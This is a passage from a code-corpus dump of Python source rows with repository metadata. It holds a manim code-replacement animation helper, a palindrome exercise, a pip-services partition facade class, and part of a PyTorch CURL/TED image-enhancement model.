        offset += len(token)
    return sliceabledict(column_to_token)
def mid(a: int, b: int) -> float:
    """Return the arithmetic midpoint of *a* and *b*.

    The previous form ``a + abs(a - b) / 2`` was only correct for ``a <= b``
    (for ``a > b`` it walked *away* from ``b``); ``(a + b) / 2`` is identical
    for ``a <= b`` and symmetric in its arguments.
    """
    return (a + b) / 2
class ReplacementCode:
    """Animate replacing one span of a rendered manim ``Code`` mobject with another."""
    # Cycle of highlight colors used for successive replacements.
    COLORS = ["#FF0000", "#00FF00", "#0000FF", "#FF00FF", "#FFFF00", "#00FFFF"]
    def __init__(self, scene, code):
        """Render *code* into *scene* as a manim Code mobject."""
        self.scene = scene
        self.code = None
        self.color_index = 0
        # A space is appended before each newline — presumably so every line
        # has at least one trailing glyph; TODO confirm.
        self.update(code.replace("\n", " \n"))
    @property
    def color(self):
        """Next highlight color; advances the color cycle on each access."""
        col = self.COLORS[self.color_index % len(self.COLORS)]
        self.color_index += 1
        return col
    def update(self, code):
        """Replace the rendered Code mobject with a fresh render of *code*."""
        if self.code:
            self.scene.remove(self.code)
        self.code = Code(
            code=dedent(code),
            scale_factor=1,
            tab_width=4,
            language="Python",
            font="Monospace",
            line_spacing=0.6,
        )
        self.scene.add(self.code)
    def normalise_col(self, *args):
        """Turn bare column ints into single-character ``(start, stop)`` spans."""
        return [(arg, arg + 1) if isinstance(arg, int) else arg for arg in args]
    def decide_directions(self, source_line, source_col, dest_line, dest_col):
        """Pick (source-exit, dest-entry) arrow directions from the dominant offset."""
        source_col, dest_col = self.normalise_col(source_col, dest_col)
        linediff = source_line - dest_line
        coldiff = mid(*source_col) - mid(*dest_col)
        # Route the arrow along whichever axis separates the spans more.
        if abs(linediff) > abs(coldiff):
            if linediff > 0:
                direction = (DOWN, UP)
            else:
                direction = (UP, DOWN)
        else:
            if coldiff > 0:
                direction = (RIGHT, LEFT)
            else:
                direction = (LEFT, RIGHT)
        return direction
    def show_from_spans(self, source_line, source_col, dest_line, dest_col):
        """Animate copying the source span onto the dest span, then re-render
        the code text with the replacement applied."""
        source_col, dest_col = self.normalise_col(source_col, dest_col)
        direction = self.decide_directions(source_line, source_col, dest_line, dest_col)
        lines = LineColEditor(self.code.code_string)
        source_manim_map = make_manim_map(lines[source_line])
        dest_manim_map = make_manim_map(lines[dest_line])
        self.show_and_replace(
            self.code.code.chars[source_line][
                source_manim_map[slice(*source_col)]
            ],
            self.code.code.chars[dest_line][
                dest_manim_map[slice(*dest_col)]
            ],
            direction,
            color=self.color,
        )
        self.color_index += 1
        # Apply the replacement to the underlying text and re-render.
        lines = LineColEditor(self.code.code_string)
        lines[dest_line][slice(*dest_col)] = lines[source_line][slice(*source_col)]
        self.update(str(lines))
    def show_from_regex(self, source_re, dest_re, alternative_dest=None):
        """Like :meth:`show_from_spans` but locating spans via regex group 1.

        NOTE(review): ``alternative_dest`` and the computed ``direction`` are
        currently unused here.
        """
        source_match, source_line, span = regex_line_span(
            source_re, self.code.code_string
        )
        dest_match, dest_line, span2 = regex_line_span(dest_re, self.code.code_string)
        direction = self.decide_directions(source_line, span, dest_line, span2)
        self.show_from_spans(source_line, span, dest_line, span2)
    def from_to_chars(self, chars1, chars2, direction, color="#FFFFFF"):
        """Highlight both char groups, draw a curved arrow between them, and
        return the Uncreate animations for later playback."""
        rect1 = SurroundingRectangle(chars1, color=color)
        rect2 = SurroundingRectangle(chars2, color=color)
        arrow = CurvedArrow(
            rect1.get_edge_center(direction[1]),
            rect2.get_edge_center(direction[0]),
            color=color,
        )
        self.scene.play(Create(rect1), Create(rect2), Create(arrow))
        self.scene.wait(2)
        return (Uncreate(rect1), Uncreate(rect2), Uncreate(arrow))
    def show_and_replace(self, chars1, chars2, direction, color="#FFFFFF", run_time=2):
        """Play the highlight, then cyclically move a copy of chars1 onto chars2."""
        uncreate = self.from_to_chars(chars1, chars2, direction, color=color)
        self.scene.play(
            CyclicReplace(
                chars1.copy(),
                chars2,
                run_time=run_time,
            ),
            FadeOut(chars2),
            *uncreate
        )
    def __enter__(self):
        """Context-manager entry; returns self."""
        return self
    def __exit__(self, *arg):
        """Remove the rendered code from the scene on context exit."""
        if self.code:
            self.scene.remove(self.code)
| 30.898204 | 88 | 0.588953 | import re
from textwrap import dedent
from string_editor import LineColEditor
from manim import (
DOWN,
LEFT,
RIGHT,
UP,
Code,
Create,
CurvedArrow,
CyclicReplace,
FadeOut,
Scene,
SurroundingRectangle,
Uncreate,
)
def regex_line_span(regex, string, group=1):
    """Search *string* for *regex* and locate the given capture group.

    Returns ``(match, line_number, (col_start, col_stop))`` where the column
    offsets are 0-based positions of the group within its own line.
    """
    m = re.search(regex, string)
    lineno = string.count("\n", 0, m.start(group))
    lines = string.split("\n")
    # Characters on all preceding lines plus their newlines, offset by -1 so
    # the -1 in char_start cancels it (for line 0 this evaluates to -1).
    previous_line_chars = sum(map(len, lines[0:lineno])) + len(lines[0:lineno]) - 1
    char_start = (m.start(group) - 1) - previous_line_chars
    char_stop = char_start + ((m.end(group) - 1) - (m.start(group) - 1))
    return m, lineno, (char_start, char_stop)
class sliceabledict(dict):
    """A dict that resolves slice keys: ``d[a:b]`` becomes ``slice(d[a], d[b])``."""
    def __getitem__(self, val):
        if isinstance(val, slice):
            return slice(self[val.start], self[val.stop])
        return super().__getitem__(val)
def make_manim_map(string):
    """Build a column -> token-index map for *string*.

    Runs of spaces form a single token and every non-space character forms
    one token each; each original column maps to the index of its token
    (presumably matching how manim lays out Code glyphs — verify).
    """
    stripped = re.findall("( +|[^ ])", string)
    char_manim_map = {}
    count = 0
    for i, c in enumerate(stripped):
        for j, _ in enumerate(c):
            char_manim_map[count + j] = i
        count += len(c)
    return sliceabledict(char_manim_map)
def mid(a: int, b: int) -> float:
    """Return the point halfway from *a* towards *b*.

    NOTE(review): for ``a > b`` this is not the midpoint; callers in this
    file pass ``(start, stop)`` spans with ``start <= stop``.
    """
    return a + (abs(a - b) / 2)
class ReplacementCode:
    """Animate replacing one span of a rendered manim ``Code`` mobject with another."""
    # Cycle of highlight colors used for successive replacements.
    COLORS = ["#FF0000", "#00FF00", "#0000FF", "#FF00FF", "#FFFF00", "#00FFFF"]
    def __init__(self, scene, code):
        """Render *code* into *scene* as a manim Code mobject."""
        self.scene = scene
        self.code = None
        self.color_index = 0
        # A space is appended before each newline — presumably so every line
        # has at least one trailing glyph; TODO confirm.
        self.update(code.replace("\n", " \n"))
    @property
    def color(self):
        """Next highlight color; advances the color cycle on each access."""
        col = self.COLORS[self.color_index % len(self.COLORS)]
        self.color_index += 1
        return col
    def update(self, code):
        """Replace the rendered Code mobject with a fresh render of *code*."""
        if self.code:
            self.scene.remove(self.code)
        self.code = Code(
            code=dedent(code),
            scale_factor=1,
            tab_width=4,
            language="Python",
            font="Monospace",
            line_spacing=0.6,
        )
        self.scene.add(self.code)
    def normalise_col(self, *args):
        """Turn bare column ints into single-character ``(start, stop)`` spans."""
        return [(arg, arg + 1) if isinstance(arg, int) else arg for arg in args]
    def decide_directions(self, source_line, source_col, dest_line, dest_col):
        """Pick (source-exit, dest-entry) arrow directions from the dominant offset."""
        source_col, dest_col = self.normalise_col(source_col, dest_col)
        linediff = source_line - dest_line
        coldiff = mid(*source_col) - mid(*dest_col)
        # Route the arrow along whichever axis separates the spans more.
        if abs(linediff) > abs(coldiff):
            if linediff > 0:
                direction = (DOWN, UP)
            else:
                direction = (UP, DOWN)
        else:
            if coldiff > 0:
                direction = (RIGHT, LEFT)
            else:
                direction = (LEFT, RIGHT)
        return direction
    def show_from_spans(self, source_line, source_col, dest_line, dest_col):
        """Animate copying the source span onto the dest span, then re-render
        the code text with the replacement applied."""
        source_col, dest_col = self.normalise_col(source_col, dest_col)
        direction = self.decide_directions(source_line, source_col, dest_line, dest_col)
        lines = LineColEditor(self.code.code_string)
        source_manim_map = make_manim_map(lines[source_line])
        dest_manim_map = make_manim_map(lines[dest_line])
        self.show_and_replace(
            self.code.code.chars[source_line][
                source_manim_map[slice(*source_col)]
            ],
            self.code.code.chars[dest_line][
                dest_manim_map[slice(*dest_col)]
            ],
            direction,
            color=self.color,
        )
        self.color_index += 1
        # Apply the replacement to the underlying text and re-render.
        lines = LineColEditor(self.code.code_string)
        lines[dest_line][slice(*dest_col)] = lines[source_line][slice(*source_col)]
        self.update(str(lines))
    def show_from_regex(self, source_re, dest_re, alternative_dest=None):
        """Like :meth:`show_from_spans` but locating spans via regex group 1.

        NOTE(review): ``alternative_dest`` and the computed ``direction`` are
        currently unused here.
        """
        source_match, source_line, span = regex_line_span(
            source_re, self.code.code_string
        )
        dest_match, dest_line, span2 = regex_line_span(dest_re, self.code.code_string)
        direction = self.decide_directions(source_line, span, dest_line, span2)
        self.show_from_spans(source_line, span, dest_line, span2)
    def from_to_chars(self, chars1, chars2, direction, color="#FFFFFF"):
        """Highlight both char groups, draw a curved arrow between them, and
        return the Uncreate animations for later playback."""
        rect1 = SurroundingRectangle(chars1, color=color)
        rect2 = SurroundingRectangle(chars2, color=color)
        arrow = CurvedArrow(
            rect1.get_edge_center(direction[1]),
            rect2.get_edge_center(direction[0]),
            color=color,
        )
        self.scene.play(Create(rect1), Create(rect2), Create(arrow))
        self.scene.wait(2)
        return (Uncreate(rect1), Uncreate(rect2), Uncreate(arrow))
    def show_and_replace(self, chars1, chars2, direction, color="#FFFFFF", run_time=2):
        """Play the highlight, then cyclically move a copy of chars1 onto chars2."""
        uncreate = self.from_to_chars(chars1, chars2, direction, color=color)
        self.scene.play(
            CyclicReplace(
                chars1.copy(),
                chars2,
                run_time=run_time,
            ),
            FadeOut(chars2),
            *uncreate
        )
    def __enter__(self):
        """Context-manager entry; returns self."""
        return self
    def __exit__(self, *arg):
        """Remove the rendered code from the scene on context exit."""
        if self.code:
            self.scene.remove(self.code)
| true | true |
1c3ca63b598327033ec30a57a8658b4017381c90 | 816 | py | Python | CS01_SprintChallenge/csCheckPalindrome.py | JeffreyAsuncion/CSPT15_ComputerScienceFundamentals | 6b8b847af6658125fa548b0133626333f255e2da | [
"MIT"
] | null | null | null | CS01_SprintChallenge/csCheckPalindrome.py | JeffreyAsuncion/CSPT15_ComputerScienceFundamentals | 6b8b847af6658125fa548b0133626333f255e2da | [
"MIT"
] | null | null | null | CS01_SprintChallenge/csCheckPalindrome.py | JeffreyAsuncion/CSPT15_ComputerScienceFundamentals | 6b8b847af6658125fa548b0133626333f255e2da | [
"MIT"
] | null | null | null | """
A palindrome is a word, phrase, number, or another sequence of characters
that reads the same backward or forward.
This includes capital letters, punctuation, and other special characters.
Given a string, write a function that checks if the input is a valid palindrome.
Examples:
csCheckPalindrome("racecar") -> true
csCheckPalindrome("anna") -> true
csCheckPalindrome("12345") -> false
csCheckPalindrome("12321") -> true
[execution time limit] 4 seconds (py3)
[input] string input_str
[output] boolean
"""
def csCheckPalindrome(input_str):
    """Return True when input_str reads identically forwards and backwards."""
    return input_str == "".join(reversed(input_str))


print(csCheckPalindrome("racecar"))  # -> true
print(csCheckPalindrome("anna"))  # -> true
print(csCheckPalindrome("12345"))  # -> false
print(csCheckPalindrome("12321"))  # -> true
# [execution time limit] 4 seconds (py3)
| 24.727273 | 80 | 0.738971 |
def csCheckPalindrome(input_str):
    """Return True when input_str reads the same backward as forward."""
    return input_str == input_str[::-1]
print(csCheckPalindrome("racecar"))  # -> True
print(csCheckPalindrome("anna"))  # -> True
print(csCheckPalindrome("12345"))  # -> False
print(csCheckPalindrome("12321"))  # -> True
| true | true |
1c3ca6606ef472e02ecb76519c6d63d47341f19d | 1,097 | py | Python | pip_services3_facade/services/PartitionFacadeService.py | pip-services3-python/pip-services3-facade-python | dfe7db79f525a1d823637c1e1d030a6333e19aa8 | [
"MIT"
] | null | null | null | pip_services3_facade/services/PartitionFacadeService.py | pip-services3-python/pip-services3-facade-python | dfe7db79f525a1d823637c1e1d030a6333e19aa8 | [
"MIT"
] | null | null | null | pip_services3_facade/services/PartitionFacadeService.py | pip-services3-python/pip-services3-facade-python | dfe7db79f525a1d823637c1e1d030a6333e19aa8 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from abc import abstractmethod
from pip_services3_commons.config import ConfigParams
from pip_services3_commons.refer import IReferences, Descriptor
from .IFacadeService import IFacadeService
from .FacadeService import FacadeService
class PartitionFacadeService(FacadeService):
    """Facade service that mounts itself as a partition (sub-path) of a
    parent facade service, which is resolved through the dependency
    resolver under the 'parent' dependency.
    """

    # Parent facade service this partition attaches to; set in set_references().
    _parent: IFacadeService

    def __init__(self):
        super(PartitionFacadeService, self).__init__()
        # Declare the 'parent' dependency: any pip-services facade-service.
        self._dependency_resolver.put('parent', Descriptor('pip-services', 'facade-service', 'default', '*', '*'))

    def configure(self, config):
        """Configure the service and its dependency resolver.

        :param config: configuration parameters (ConfigParams)
        """
        super().configure(config)
        self._dependency_resolver.configure(config)

    def set_references(self, references):
        """Resolve the parent facade and attach this partition to it.

        Registers the partition middleware on the parent for this service's
        root path, then calls _register() so subclasses can add their routes.
        `self._partition` and `self._root_path` are presumably provided by the
        FacadeService base class — TODO confirm against the base implementation.

        :param references: component references (IReferences)
        """
        super().set_references(references)
        self._parent = self._dependency_resolver.get_one_required('parent')
        self._parent.register_middleware_for_path(self._root_path, self._partition)
        self._register()

    def get_root_path(self):
        """Return the full path of this partition: parent root + own root path."""
        return self._parent.get_root_path() + self._root_path

    def _register(self):
        """
        Override in child classes
        """
| 30.472222 | 114 | 0.7165 |
from abc import abstractmethod
from pip_services3_commons.config import ConfigParams
from pip_services3_commons.refer import IReferences, Descriptor
from .IFacadeService import IFacadeService
from .FacadeService import FacadeService
class PartitionFacadeService(FacadeService):
_parent: IFacadeService
def __init__(self):
super(PartitionFacadeService, self).__init__()
self._dependency_resolver.put('parent', Descriptor('pip-services', 'facade-service', 'default', '*', '*'))
def configure(self, config):
super().configure(config)
self._dependency_resolver.configure(config)
def set_references(self, references):
super().set_references(references)
self._parent = self._dependency_resolver.get_one_required('parent')
self._parent.register_middleware_for_path(self._root_path, self._partition)
self._register()
def get_root_path(self):
return self._parent.get_root_path() + self._root_path
def _register(self):
| true | true |
1c3ca6c3897643e98271b6be85be2e7bae3b2591 | 10,077 | py | Python | raw_ted.py | deshwalmahesh/CURL---cpu-gpu | f4e87275b6cce556b9e04a188cf7ae13d810d82a | [
"BSD-3-Clause"
] | 125 | 2020-10-16T12:25:59.000Z | 2022-03-22T06:04:57.000Z | raw_ted.py | deshwalmahesh/CURL---cpu-gpu | f4e87275b6cce556b9e04a188cf7ae13d810d82a | [
"BSD-3-Clause"
] | 22 | 2020-10-19T10:40:05.000Z | 2022-02-14T12:01:46.000Z | raw_ted.py | deshwalmahesh/CURL---cpu-gpu | f4e87275b6cce556b9e04a188cf7ae13d810d82a | [
"BSD-3-Clause"
] | 23 | 2020-11-05T09:23:52.000Z | 2022-03-24T08:00:50.000Z | # -*- coding: utf-8 -*-
'''
This is a PyTorch implementation of CURL: Neural Curve Layers for Global Image Enhancement
https://arxiv.org/pdf/1911.13175.pdf
Please cite paper if you use this code.
Tested with Pytorch 1.7.1, Python 3.7.9
Authors: Sean Moran (sean.j.moran@gmail.com), 2020
'''
import numpy as np
import torch
import torch.nn as nn
from math import sqrt
from torch.nn import init
from torch.autograd import Variable
import torch.nn.functional as F
class Flatten(nn.Module):
    """Collapse all dimensions after the batch axis into a single vector."""

    def forward(self, x):
        """Return a 2-D view of `x` with shape (batch, -1).

        :param x: Tensor with a leading batch dimension
        :returns: flattened 2-D Tensor
        :rtype: Tensor
        """
        batch_size = x.size(0)
        return x.view(batch_size, -1)
class TED(nn.Module):
    """Transformed Encoder Decoder (TED).

    A U-Net-style encoder/decoder whose top skip connection is enriched by
    fusing the first-level encoder features with dilated mid-level features
    (MidNet2/MidNet4) and a global feature vector (glob_net1) before the
    final decoding stage. A residual connection adds the (channel-tiled)
    input back before the last convolution.
    """

    def __init__(self):
        """Build the encoder, decoder, mid-level and global feature networks.

        :returns: N/A
        :rtype: N/A
        """
        super().__init__()

        def layer(nIn, nOut, k, s, p, d=1):
            # Conv + LeakyReLU building block used by the global feature net.
            return nn.Sequential(nn.Conv2d(nIn, nOut, k, s, p, d), nn.LeakyReLU(inplace=True))

        # NOTE(review): conv1/conv2/conv3 and local_net are never used in
        # forward(); they are kept because they hold parameters and removing
        # them would break loading of existing checkpoints.
        self.conv1 = nn.Conv2d(16, 64, 1)
        self.conv2 = nn.Conv2d(32, 64, 1)
        self.conv3 = nn.Conv2d(64, 64, 1)

        self.mid_net2_1 = MidNet2(in_channels=16)
        self.mid_net4_1 = MidNet4(in_channels=16)
        self.local_net = LocalNet(16)

        # Encoder: 4-channel packed input, spatial size halved per level.
        self.dconv_down1 = LocalNet(4, 16)
        self.dconv_down2 = LocalNet(16, 32)
        self.dconv_down3 = LocalNet(32, 64)
        self.dconv_down4 = LocalNet(64, 128)
        self.dconv_down5 = LocalNet(128, 128)

        self.maxpool = nn.MaxPool2d(2, padding=0)
        self.upsample = nn.UpsamplingNearest2d(scale_factor=2)

        # 1x1 projections applied after each nearest-neighbour upsample.
        self.up_conv1x1_1 = nn.Conv2d(128, 128, 1)
        self.up_conv1x1_2 = nn.Conv2d(64, 64, 1)
        self.up_conv1x1_3 = nn.Conv2d(32, 32, 1)
        self.up_conv1x1_4 = nn.Conv2d(16, 16, 1)

        # Decoder.
        self.dconv_up4 = LocalNet(128, 64)
        self.dconv_up3 = LocalNet(64, 32)
        self.dconv_up2 = LocalNet(32, 16)
        self.dconv_up1 = LocalNet(32, 16)

        self.conv_last = LocalNet(16, 64)

        # Fuses the top skip: 16 (conv1) + 64 + 64 + 64 = 208 input channels.
        self.conv_fuse1 = nn.Conv2d(208, 16, 1)

        self.glob_net1 = nn.Sequential(
            layer(16, 64, 3, 2, 1),
            nn.MaxPool2d(kernel_size=3, stride=2, padding=1),
            layer(64, 64, 3, 2, 1),
            nn.MaxPool2d(kernel_size=3, stride=2, padding=1),
            layer(64, 64, 3, 2, 1),
            nn.MaxPool2d(kernel_size=3, stride=2, padding=1),
            layer(64, 64, 3, 2, 1),
            nn.MaxPool2d(kernel_size=3, stride=2, padding=1),
            layer(64, 64, 3, 2, 1),
            nn.AdaptiveAvgPool2d(1),
            Flatten(),
            nn.Dropout(0.5),
            nn.Linear(64, 64),
        )

    @staticmethod
    def _match_spatial(x, ref):
        """Pad `x` by one pixel on the left and/or bottom so its spatial size
        matches `ref` (upsampling of odd-sized maps can undershoot by one).

        :param x: tensor to pad (N, C, H, W)
        :param ref: tensor whose H/W must be matched
        :returns: `x`, padded if needed
        :rtype: Tensor
        """
        pad_left = 1 if x.shape[3] != ref.shape[3] else 0
        pad_bottom = 1 if x.shape[2] != ref.shape[2] else 0
        if pad_left or pad_bottom:
            # F.pad order is (left, right, top, bottom).
            x = torch.nn.functional.pad(x, (pad_left, 0, 0, pad_bottom))
        return x

    def forward(self, x):
        """Forward function for the TED network.

        :param x: input image tensor (N, 4, H, W)
        :returns: 64-channel convolutional features
        :rtype: Tensor
        """
        # Tiled input for the residual connection (4 -> 16 channels).
        x_in_tile = x.repeat(1, 4, 1, 1)

        conv1 = self.dconv_down1(x)
        x = self.maxpool(conv1)

        conv2 = self.dconv_down2(x)
        x = self.maxpool(conv2)

        conv3 = self.dconv_down3(x)
        x = self.maxpool(conv3)

        conv4 = self.dconv_down4(x)
        x = self.maxpool(conv4)

        x = self.dconv_down5(x)

        x = self.up_conv1x1_1(self.upsample(x))
        x = self._match_spatial(x, conv4)
        del conv4
        x = self.dconv_up4(x)

        x = self.up_conv1x1_2(self.upsample(x))
        x = self._match_spatial(x, conv3)
        x = self.dconv_up3(x)
        x = self.up_conv1x1_3(self.upsample(x))
        del conv3

        x = self._match_spatial(x, conv2)
        x = self.dconv_up2(x)
        x = self.up_conv1x1_4(self.upsample(x))
        del conv2

        # Mid-level (dilated) and global features, all computed on conv1.
        mid_features1 = self.mid_net2_1(conv1)
        mid_features2 = self.mid_net4_1(conv1)
        glob_features = self.glob_net1(conv1)
        # Broadcast the global vector over the spatial grid of the mid features.
        glob_features = glob_features.unsqueeze(2).unsqueeze(3)
        glob_features = glob_features.repeat(
            1, 1, mid_features1.shape[2], mid_features1.shape[3])
        fuse = torch.cat(
            (conv1, mid_features1, mid_features2, glob_features), 1)
        conv1_fuse = self.conv_fuse1(fuse)

        x = self._match_spatial(x, conv1)
        x = torch.cat([x, conv1_fuse], dim=1)
        del conv1

        x = self.dconv_up1(x)
        x = x + x_in_tile  # residual connection to the tiled input
        out = self.conv_last(x)
        return out
class LocalNet(nn.Module):
    """Double 3x3 convolution with reflection padding and LeakyReLU.

    Spatial size is preserved (pad-by-1 then unpadded 3x3 conv, twice).
    """

    def __init__(self, in_channels=16, out_channels=64):
        """Create the two convolutions and shared activation/padding modules.

        :param in_channels: number of input channels
        :param out_channels: number of output channels
        :returns: N/A
        :rtype: N/A
        """
        super(LocalNet, self).__init__()
        self.conv1 = nn.Conv2d(in_channels, out_channels, 3, 1, 0, 1)
        self.conv2 = nn.Conv2d(out_channels, out_channels, 3, 1, 0, 1)
        self.lrelu = nn.LeakyReLU()
        self.refpad = nn.ReflectionPad2d(1)

    def forward(self, x_in):
        """Apply pad -> conv -> LeakyReLU twice.

        :param x_in: input convolutional features
        :returns: convolutional features with `out_channels` channels
        :rtype: Tensor
        """
        features = self.lrelu(self.conv1(self.refpad(x_in)))
        features = self.lrelu(self.conv2(self.refpad(features)))
        return features
class MidNet2(nn.Module):
    """Mid-level feature network: four 3x3 convolutions with dilation rate 2.

    LeakyReLU follows the first three convolutions; the last is linear.
    With padding 2 and dilation 2 the spatial size is preserved.
    """

    def __init__(self, in_channels=16):
        """Create the dilated convolution stack.

        :param in_channels: number of input channels
        :returns: N/A
        :rtype: N/A
        """
        super(MidNet2, self).__init__()
        self.lrelu = nn.LeakyReLU()
        self.conv1 = nn.Conv2d(in_channels, 64, 3, 1, 2, 2)
        self.conv2 = nn.Conv2d(64, 64, 3, 1, 2, 2)
        self.conv3 = nn.Conv2d(64, 64, 3, 1, 2, 2)
        self.conv4 = nn.Conv2d(64, 64, 3, 1, 2, 2)

    def forward(self, x_in):
        """Run the dilation-2 stack and return 64-channel features.

        :param x_in: input convolutional features
        :returns: processed convolutional features
        :rtype: Tensor
        """
        feat = self.lrelu(self.conv1(x_in))
        feat = self.lrelu(self.conv2(feat))
        feat = self.lrelu(self.conv3(feat))
        return self.conv4(feat)
class MidNet4(nn.Module):
    """Mid-level feature network: four 3x3 convolutions with dilation rate 4.

    LeakyReLU follows the first three convolutions; the last is linear.
    With padding 4 and dilation 4 the spatial size is preserved.
    """

    def __init__(self, in_channels=16):
        """Create the dilated convolution stack.

        :param in_channels: number of input channels
        :returns: N/A
        :rtype: N/A
        """
        super(MidNet4, self).__init__()
        self.lrelu = nn.LeakyReLU()
        self.conv1 = nn.Conv2d(in_channels, 64, 3, 1, 4, 4)
        self.conv2 = nn.Conv2d(64, 64, 3, 1, 4, 4)
        self.conv3 = nn.Conv2d(64, 64, 3, 1, 4, 4)
        self.conv4 = nn.Conv2d(64, 64, 3, 1, 4, 4)

    def forward(self, x_in):
        """Run the dilation-4 stack and return 64-channel features.

        :param x_in: input convolutional features
        :returns: processed convolutional features
        :rtype: Tensor
        """
        feat = self.lrelu(self.conv1(x_in))
        feat = self.lrelu(self.conv2(feat))
        feat = self.lrelu(self.conv3(feat))
        return self.conv4(feat)
class SimpleUpsampler(nn.Sequential):
    """Pixel-shuffle upsampler.

    Rearranges a (N, C*scale^2, H, W) tensor into (N, C, H*scale, W*scale).
    """

    def __init__(self, scale):
        """Build the upsampler.

        :param scale: integer upsampling factor
        :returns: N/A
        :rtype: N/A
        """
        # Pass the module directly; no need for an intermediate list.
        super(SimpleUpsampler, self).__init__(nn.PixelShuffle(scale))
def DownSamplingShuffle(x):
    """Pixel-shuffle downsample (space-to-depth by a factor of 2).

    Stacks the four 2x2 sub-grids of the input along the channel axis, so a
    (N, C, H, W) tensor becomes (N, 4*C, H//2, W//2). Intended for packing a
    RAW mosaic into one channel per colour site.

    :param x: RAW image tensor (N, C, H, W); H and W are assumed even —
              TODO confirm against callers
    :returns: RAW image shuffled to 4x the channels at half resolution
    :rtype: Tensor
    """
    # Strided slicing picks each of the four phases directly; the previous
    # version unpacked x.shape into unused locals to build the same slices.
    return torch.cat((x[:, :, 0::2, 0::2],
                      x[:, :, 0::2, 1::2],
                      x[:, :, 1::2, 0::2],
                      x[:, :, 1::2, 1::2]), 1)
# Model definition
class TEDModel(nn.Module):
    """TED backbone plus pixel-shuffle upsampling and a final 3x3 conv.

    Input is space-to-depth packed (4 channels, half resolution), run through
    TED, upsampled back to full resolution (64 -> 16 channels), then projected
    to 64 feature channels.
    """

    def __init__(self):
        """Initialisation function for the TED model.

        :returns: N/A
        :rtype: N/A
        """
        super(TEDModel, self).__init__()

        self.ted = TED()
        self.final_conv = nn.Conv2d(16, 64, 3, 1, 0, 1)
        self.refpad = nn.ReflectionPad2d(1)
        # Built once here instead of on every forward() call; PixelShuffle has
        # no parameters, so existing checkpoints still load unchanged.
        self.upsample = SimpleUpsampler(2)

    def forward(self, image):
        """Forward function for TED.

        :param image: image tensor to process (N, C, H, W)
        :returns: convolutional features
        :rtype: Tensor
        """
        image_shuffled = DownSamplingShuffle(image)
        output_image = self.ted(image_shuffled.float())
        output_image = self.upsample(output_image)
        return self.final_conv(self.refpad(output_image))
| 28.873926 | 95 | 0.545103 |
import numpy as np
import torch
import torch.nn as nn
from math import sqrt
from torch.nn import init
from torch.autograd import Variable
import torch.nn.functional as F
class Flatten(nn.Module):
def forward(self, x):
return x.view(x.size()[0], -1)
class TED(nn.Module):
def __init__(self):
super().__init__()
def layer(nIn, nOut, k, s, p, d=1):
return nn.Sequential(nn.Conv2d(nIn, nOut, k, s, p, d), nn.LeakyReLU(inplace=True))
self.conv1 = nn.Conv2d(16, 64, 1)
self.conv2 = nn.Conv2d(32, 64, 1)
self.conv3 = nn.Conv2d(64, 64, 1)
self.mid_net2_1 = MidNet2(in_channels=16)
self.mid_net4_1 = MidNet4(in_channels=16)
self.local_net = LocalNet(16)
self.dconv_down1 = LocalNet(4, 16)
self.dconv_down2 = LocalNet(16, 32)
self.dconv_down3 = LocalNet(32, 64)
self.dconv_down4 = LocalNet(64, 128)
self.dconv_down5 = LocalNet(128, 128)
self.maxpool = nn.MaxPool2d(2, padding=0)
self.upsample = nn.UpsamplingNearest2d(scale_factor=2)
self.up_conv1x1_1 = nn.Conv2d(128, 128, 1)
self.up_conv1x1_2 = nn.Conv2d(64, 64, 1)
self.up_conv1x1_3 = nn.Conv2d(32, 32, 1)
self.up_conv1x1_4 = nn.Conv2d(16, 16, 1)
self.dconv_up4 = LocalNet(128, 64)
self.dconv_up3 = LocalNet(64, 32)
self.dconv_up2 = LocalNet(32, 16)
self.dconv_up1 = LocalNet(32, 16)
self.conv_last = LocalNet(16, 64)
self.conv_fuse1 = nn.Conv2d(208, 16, 1)
self.glob_net1 = nn.Sequential(
layer(16, 64, 3, 2, 1),
nn.MaxPool2d(kernel_size=3, stride=2, padding=1),
layer(64, 64, 3, 2, 1),
nn.MaxPool2d(kernel_size=3, stride=2, padding=1),
layer(64, 64, 3, 2, 1),
nn.MaxPool2d(kernel_size=3, stride=2, padding=1),
layer(64, 64, 3, 2, 1),
nn.MaxPool2d(kernel_size=3, stride=2, padding=1),
layer(64, 64, 3, 2, 1),
nn.AdaptiveAvgPool2d(1),
Flatten(),
nn.Dropout(0.5),
nn.Linear(64, 64),
)
def forward(self, x):
x_in_tile = x.repeat(1, 4, 1, 1)
conv1 = self.dconv_down1(x)
x = self.maxpool(conv1)
conv2 = self.dconv_down2(x)
x = self.maxpool(conv2)
conv3 = self.dconv_down3(x)
x = self.maxpool(conv3)
conv4 = self.dconv_down4(x)
x = self.maxpool(conv4)
x = self.dconv_down5(x)
x = self.up_conv1x1_1(self.upsample(x))
if x.shape[3] != conv4.shape[3] and x.shape[2] != conv4.shape[2]:
x = torch.nn.functional.pad(x, (1, 0, 0, 1))
elif x.shape[2] != conv4.shape[2]:
x = torch.nn.functional.pad(x, (0, 0, 0, 1))
elif x.shape[3] != conv4.shape[3]:
x = torch.nn.functional.pad(x, (1, 0, 0, 0))
del conv4
x = self.dconv_up4(x)
x = self.up_conv1x1_2(self.upsample(x))
if x.shape[3] != conv3.shape[3] and x.shape[2] != conv3.shape[2]:
x = torch.nn.functional.pad(x, (1, 0, 0, 1))
elif x.shape[2] != conv3.shape[2]:
x = torch.nn.functional.pad(x, (0, 0, 0, 1))
elif x.shape[3] != conv3.shape[3]:
x = torch.nn.functional.pad(x, (1, 0, 0, 0))
x = self.dconv_up3(x)
x = self.up_conv1x1_3(self.upsample(x))
del conv3
if x.shape[3] != conv2.shape[3] and x.shape[2] != conv2.shape[2]:
x = torch.nn.functional.pad(x, (1, 0, 0, 1))
elif x.shape[2] != conv2.shape[2]:
x = torch.nn.functional.pad(x, (0, 0, 0, 1))
elif x.shape[3] != conv2.shape[3]:
x = torch.nn.functional.pad(x, (1, 0, 0, 0))
x = self.dconv_up2(x)
x = self.up_conv1x1_4(self.upsample(x))
del conv2
mid_features1 = self.mid_net2_1(conv1)
mid_features2 = self.mid_net4_1(conv1)
glob_features = self.glob_net1(conv1)
glob_features = glob_features.unsqueeze(2)
glob_features = glob_features.unsqueeze(3)
glob_features = glob_features.repeat(
1, 1, mid_features1.shape[2], mid_features1.shape[3])
fuse = torch.cat(
(conv1, mid_features1, mid_features2, glob_features), 1)
conv1_fuse = self.conv_fuse1(fuse)
if x.shape[3] != conv1.shape[3] and x.shape[2] != conv1.shape[2]:
x = torch.nn.functional.pad(x, (1, 0, 0, 1))
elif x.shape[2] != conv1.shape[2]:
